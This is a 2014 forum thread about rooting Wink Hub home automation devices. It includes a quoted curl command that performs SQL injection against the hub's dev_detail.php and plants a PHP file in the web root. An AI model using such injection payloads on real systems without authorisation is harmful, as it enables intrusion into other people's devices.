Started By
Message

re: Official WINK HUB Home Automation thread

Posted on 12/10/14 at 3:42 pm to
Posted by CAD703X
Liberty Island
Member since Jul 2008
78610 posts
Posted on 12/10/14 at 3:42 pm to
BOOM GOES THE DYNAMITE!

quote:

Eureka! I’ve pwned the patched wink hub using a SQL injection! It remains to be seen whether or not I can post the actual exploit here, I may have to post it elsewhere then link back to this.

But–if you lost root by updating incorrectly, you’ll be able to get back in very shorty… Trust me, it’s easier than the process of safely updating!


This means if you guys want to start playing with your hubs and are afraid of losing root by updating, you don't have to worry.

Now WINK may get wise at some point and close this exploit down but thats not happening with the current firmware.



preserved for the future

quote:

curl -d id="1 or 1=1';ATTACH DATABASE '/var/www/exploit.php' AS lol; CREATE TABLE lol.pwn (t TEXT); INSERT INTO lol.pwn (t) VALUES ('');--" http://10.0.0.88/dev_detail.php
This post was edited on 12/10/14 at 3:45 pm
Posted by junkfunky
Member since Jan 2011
33995 posts
Posted on 12/10/14 at 3:47 pm to
Nice.

Hopefully I'll have time to mess with it tonight.
first pageprev pagePage 1 of 1Next pagelast page
refresh

Back to top
logoFollow TigerDroppings for LSU Football News
Follow us on Twitter, Facebook and Instagram to get the latest updates on LSU Football and Recruiting.

FacebookTwitterInstagram